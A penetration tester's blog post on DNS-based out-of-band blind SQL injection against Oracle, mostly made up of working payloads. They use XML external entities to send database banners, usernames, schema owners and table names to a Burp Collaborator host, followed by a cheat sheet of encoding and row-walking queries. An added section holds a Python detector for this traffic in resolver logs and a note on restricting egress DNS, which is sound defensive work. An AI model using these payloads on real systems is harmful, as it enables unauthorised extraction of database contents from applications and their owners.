DNS Based Out of Band Blind SQL injection in Oracle — Dumping data

Burp Collaborator DNS Interaction
http://website.com/somesearch-endpoint?q=%2c%20(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % taeyj SYSTEM "http://adfdlongrandomburpcollabstringjflf.burpcollab'||'orator.net/">%taeyj;]>'),'/l') from dual)

Determining the backend database

Dumping Data???

http://website.com/somesearch-endpoint?q=%2c%20(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % taeyj SYSTEM "http://'||(select banner from v$version)||'.adfdlongrandomburpcollabstringjflf.burpcollab'||'orator.net/">%taeyj;]>'),'/l') from dual)

Things to Keep in Mind while Exploiting DNS based Out of Band SQL Injections

  • You are exfiltrating data inside DNS queries, and spaces, newlines and most special characters are not allowed in domain names: a label may only contain letters, digits and hyphens ‘-’. Use REPLACE() to substitute anything else before it is concatenated into the hostname (some environments also reject extra dots ‘.’, so replace those as well). Alternatively hex- or Base64-encode the output, e.g. utl_raw.cast_to_raw() followed by utl_encode.base64_encode() and UTL_RAW.CAST_TO_VARCHAR2() to get a string back; note that Base64 output still contains ‘=’ and ‘/’, which must be replaced too. (Ref https://dba.stackexchange.com/questions/128905/what-is-a-base64-raw-how-do-i-use-it)
  • A full domain name may be at most 253 characters long, and each label at most 63 characters. Only 63 characters therefore fit in one subdomain label, and it is safer to dump 30–40 characters per request. Use SUBSTR() to limit the output.
  • Most probably you will have to generate a new Burp Collaborator hostname for every request you send. The reason is resolver caching: the server (or its resolver) will not issue a fresh DNS query for a name it has already resolved, so a repeated hostname produces no new interaction.
  • Backend code may be sanitising some characters in your query, so try simple queries first and then move on to complex ones. While exploiting this SQLi I never got “select banner from v$version”, or any other query containing a dollar sign “$”, to work. I tried different encodings but none of them worked. The reason may be that some special characters are sanitised or encoded, or it might be something else entirely; I don’t know.
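The same constraints the list above works around (a fresh callback hostname per request, long or encoded leftmost labels, the ‘=’ and ‘/’ of Base64 swapped for ‘-’) are what makes this technique visible in resolver logs. The following script is an added example, not code from the original post: it parses an assumed "<timestamp> <client-ip> <qname> <qtype>" query log, flags queries that match those signals, and makes a best-effort attempt to recover hex or Base64 chunks so an incident responder can tell what left the database. The sample log lines are constructed; the callback hostname is the one shown in the post, and the thresholds (30-char label, 3.5 bits/char entropy, 3 distinct subdomains) are assumptions to tune for your environment.

```python
"""Detect the DNS out-of-band exfiltration pattern described above in resolver logs.

Added example, not code from the original post. Signals: a known callback domain,
long or high-entropy leftmost labels (30-40 char chunks, 63-char label limit), and
a fresh subdomain per request. Recovered chunks help assess what data was dumped.
"""
import base64
import binascii
import math
import re
from collections import Counter, defaultdict
from typing import Optional

# Callback domain used in the write-up; add your own canary/OOB domains here.
KNOWN_OOB_SUFFIXES = ("burpcollaborator.net",)
MAX_LABEL = 63            # RFC 1035 per-label limit
MAX_NAME = 253            # RFC 1035 full-name limit
LONG_LABEL = 30           # the post recommends 30-40 characters per query (assumed threshold)
ENTROPY_THRESHOLD = 3.5   # bits/char; ordinary hostnames sit well below this (assumed)
MIN_DISTINCT = 3          # distinct leftmost labels under one parent from one client (assumed)

# Assumed log format: "<timestamp> <client-ip> <qname> <qtype>", one query per line.
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)$")

# Constructed sample chunks, encoded the way the post's queries do it:
# Base64 with '=' and '/' replaced by '-', or plain hex.
B64_CHUNK = base64.b64encode(b"SYS-SYSTEM-OUTLN").decode().replace("=", "-").replace("/", "-")
HEX_CHUNK = binascii.hexlify(b"SYS-SYSTEM-OUTLN").decode().upper()
CALLBACK = "adfdlongrandomburpcollabstringjflf.burpcollaborator.net"

# Constructed sample log (not real traffic): two benign lookups, then three
# callbacks from one client carrying a bare username, a Base64 chunk and a hex chunk.
SAMPLE_LOG = f"""\
2023-05-01T10:00:01Z 10.0.0.5 www.example.com. A
2023-05-01T10:00:02Z 10.0.0.5 mail.example.com. MX
2023-05-01T10:00:03Z 10.0.0.5 SYS.{CALLBACK}. A
2023-05-01T10:00:04Z 10.0.0.5 {B64_CHUNK}.{CALLBACK}. A
2023-05-01T10:00:05Z 10.0.0.5 {HEX_CHUNK}.{CALLBACK}. A
"""


def shannon_entropy(s: str) -> float:
    """Bits per character of the string; 0.0 for the empty string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def restore_base64(label: str) -> str:
    """Undo the '-' substitution: trailing '-' were padding '=', interior '-' were '/'."""
    stripped = label.rstrip("-")
    pad = min(len(label) - len(stripped), 2)
    return stripped.replace("-", "/") + "=" * pad


def try_decode_chunk(label: str) -> Optional[bytes]:
    """Best-effort recovery of a data chunk; None if it is neither hex nor Base64."""
    if len(label) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", label):
        return bytes.fromhex(label)
    for candidate in (restore_base64(label), label.replace("-", "/")):
        try:
            return base64.b64decode(candidate, validate=True)
        except (binascii.Error, ValueError):
            continue
    return None


def is_known_oob(qname: str) -> bool:
    return any(qname == s or qname.endswith("." + s) for s in KNOWN_OOB_SUFFIXES)


def analyze(log_text: str) -> list:
    """One finding per suspicious query, plus one per (client, parent) with many distinct subdomains."""
    findings = []
    per_parent = defaultdict(set)  # (client, parent domain) -> distinct leftmost labels
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        qname = m["qname"].rstrip(".")
        labels = qname.split(".")
        first = labels[0]
        reasons = []
        if is_known_oob(qname):
            reasons.append("known OOB callback domain")
        if len(first) > LONG_LABEL:
            reasons.append(f"leftmost label is {len(first)} chars")
        if shannon_entropy(first) > ENTROPY_THRESHOLD:
            reasons.append(f"high-entropy label ({shannon_entropy(first):.2f} bits/char)")
        if len(first) > MAX_LABEL or len(qname) > MAX_NAME:
            reasons.append("exceeds DNS length limits")
        per_parent[(m["client"], ".".join(labels[-3:]))].add(first)
        if reasons:
            findings.append({"client": m["client"], "qname": qname,
                             "reasons": reasons, "decoded": try_decode_chunk(first)})
    # A new hostname per request (to defeat caching) leaves many distinct
    # leftmost labels under the same parent domain from the same client.
    for (client, parent), firsts in per_parent.items():
        if len(firsts) >= MIN_DISTINCT:
            findings.append({"client": client, "qname": parent,
                             "reasons": [f"{len(firsts)} distinct subdomains"], "decoded": None})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["client"], f["qname"], "; ".join(f["reasons"]), f["decoded"])
```

Two caveats when running this over real logs: DNS names are case-insensitive and some resolvers or log pipelines fold them to lower case, after which a Base64 chunk cannot be recovered (hex survives case folding); and the callback-domain list is only a starting point, since an attacker can use any domain they control, so the length, entropy and cardinality heuristics matter more than the suffix match. The cleanest mitigation is upstream of detection: a database server has no business resolving arbitrary external names, so egress DNS from it should be restricted to internal resolvers with no recursion to the internet.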

Dumping Data

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % cggnv SYSTEM "http://'||(SELECT replace(replace(username,' ','-'),'$','-') FROM all_users where rownum=1)||'.sealongrandomcollabstringai.burpcollab'||'orator.net/">%cggnv;]>'),'/l') from dual)
(SELECT replace(replace(username,' ','-'),'$','-') FROM all_users where rownum=1)
(SELECT username FROM all_users where rownum=1)
Walking rows one at a time: ROW_NUMBER() OVER (ORDER BY ...) numbers the rows after sorting, whereas ROWNUM is assigned before ORDER BY is applied, so the nth row would not be stable.
(SELECT username FROM (SELECT username, ROW_NUMBER() OVER (ORDER BY username) as rn FROM all_users) where rn=2)
(select owner from (select owner, rownum as rn from (select DISTINCT owner from all_tables order by owner asc)) where rn=1)
(select owner from (select owner, rownum as rn from (select DISTINCT owner from all_tables order by owner asc)) where rn=2)
(select table_name from (select table_name, ROW_NUMBER() OVER (ORDER BY table_name) as rn from all_tables) where rn=1)
(select replace(replace(table_name,' ','-'),'$','-') from (select table_name, ROW_NUMBER() OVER (ORDER BY table_name) as rn from all_tables) where rn=1)

Dump In One Shot (DIOS)

select ltrim(sys_connect_by_path(username, '-'),'-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select ltrim(sys_connect_by_path(username, '-'),'-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 10) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select substr(replace(replace(ltrim(sys_connect_by_path(username, '-'),'-'),'_','-'),'$','-'),2,40)as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<=40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode (utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(username, '-'),'-'),2,40)))),'=','-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;

Cheat Sheet

select username FROM all_users where rownum=1
Replacing bad characters (space, ‘$’ and ‘_’ are not valid in a hostname label):
select replace(replace(replace(username,' ','-'),'$','-'),'_','-') FROM all_users where rownum=1
(SELECT replace(replace(replace(username,' ','-'),'$','-'),'_','-') FROM (SELECT username, ROW_NUMBER() OVER (ORDER BY username) as rn FROM all_users) where rn=1)
(select replace(replace(replace(owner,' ','-'),'$','-'),'_','-') from (select owner, rownum as rn from (select DISTINCT owner from all_tables order by owner asc)) where rn=1)
(select replace(replace(replace(table_name,' ','-'),'$','-'),'_','-') from (select table_name, ROW_NUMBER() OVER (ORDER BY table_name) as rn from all_tables) where rn=1)
select substr(replace(replace(replace(ltrim(sys_connect_by_path(username, '-'),'-'),'_','-'),'$','-'),' ','-'),2,40)as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select substr(replace(replace(replace(ltrim(sys_connect_by_path(owner, '-'),'-'),'_','-'),'$','-'),' ','-'),2,40)as st FROM (SELECT owner, ROW_NUMBER () OVER (ORDER BY owner) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select substr(replace(replace(replace(ltrim(sys_connect_by_path(table_name, '-'),'-'),'_','-'),'$','-'),' ','-'),2,40)as st FROM (SELECT table_name, ROW_NUMBER () OVER (ORDER BY table_name) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(replace(replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode(utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(username,'-'),'-'),2,40)))),'=','-'),' ','-'),'/','-')as st FROM (SELECT username, ROW_NUMBER () OVER (ORDER BY username) rn, COUNT (*) OVER () cnt FROM all_users where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(replace(replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode(utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(owner,'-'),'-'),2,40)))),'=','-'),' ','-'),'/','-')as st FROM (SELECT owner, ROW_NUMBER () OVER (ORDER BY owner) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;
select replace(replace(replace(UTL_RAW.CAST_TO_VARCHAR2(utl_encode.base64_encode(utl_raw.cast_to_raw(substr(ltrim(sys_connect_by_path(table_name, '-'),'-'),2,40)))),'=','-'),' ','-'),'/','-')as st FROM (SELECT table_name, ROW_NUMBER () OVER (ORDER BY table_name) rn, COUNT (*) OVER () cnt FROM all_tables where rownum<= 40) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn+1;


Ethical Hacker | Penetration Tester https://twitter.com/UsamaAzad14
